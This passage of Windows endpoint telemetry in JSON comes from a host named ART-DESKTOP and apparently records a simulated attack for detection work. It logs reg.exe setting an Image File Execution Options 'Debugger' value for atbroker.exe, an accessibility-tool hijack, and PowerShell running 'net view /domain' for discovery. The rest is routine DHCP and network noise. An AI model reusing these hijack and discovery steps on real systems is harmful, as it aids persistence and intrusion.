"{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "registry", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", - "registry_value": "atbroker.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "registry", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "process", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "process", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5244, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571830030000, - "unique_pid": 
"{42FC7E13-CB3F-5C05-0000-0010E04D5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - "event_type": "process", - "pid": 5244, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829950016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010E04D5101}" - }, - { - 
"command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view /domain\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5360, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571831130016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - 
"pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571831050000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "command_line": "net view /domain", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5628, - "ppid": 5360, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "create", - "timestamp": 131883571831220000, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}", - "unique_ppid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "net.exe", - "image_path": "C:\\Windows\\System32\\net.exe", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { 
- "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 5628, - 
"process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - 
"unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "image_load", - "image_name": "cscapi.dll", - "image_path": "C:\\Windows\\System32\\cscapi.dll", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571831200016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "5353", - "event_type": "network", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "224.0.0.251", - "source_port": "5353", - "subtype": "incoming", - "timestamp": 131883571831380000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", - "destination_port": "5353", - "event_type": "network", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "ff02:0:0:0:0:0:0:fb", - "source_port": "5353", - "subtype": "incoming", - "timestamp": 131883571831390000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": 
"NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "137", - "subtype": "outgoing", - "timestamp": 131883571841500000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "fe80:0:0:0:880a:c7ff:8cc2:f18b", - "destination_port": "5355", - "event_type": "network", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "fe80:0:0:0:c155:c569:9151:7881", - "source_port": "56888", - "subtype": "incoming", - "timestamp": 131883571841509984, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpInterfaceOptions", - "registry_value": "DhcpInterfaceOptions", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpIPAddress", - "registry_value": "DhcpIPAddress", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpSubnetMask", - "registry_value": "DhcpSubnetMask", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpServer", - "registry_value": "DhcpServer", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\Lease", - "registry_value": "Lease", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - 
"process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseObtainedTime", - "registry_value": "LeaseObtainedTime", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T1", - "registry_value": "T1", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T2", - "registry_value": "T2", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseTerminatesTime", - "registry_value": 
"LeaseTerminatesTime", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\AddressType", - "registry_value": "AddressType", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\IsServerNapAware", - "registry_value": "IsServerNapAware", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpConnForceBroadcastFlag", - "registry_value": "DhcpConnForceBroadcastFlag", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": 
"HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", - "registry_value": "NetBT", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", - "registry_value": "NetBT", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": 
"c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - 
"process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows 
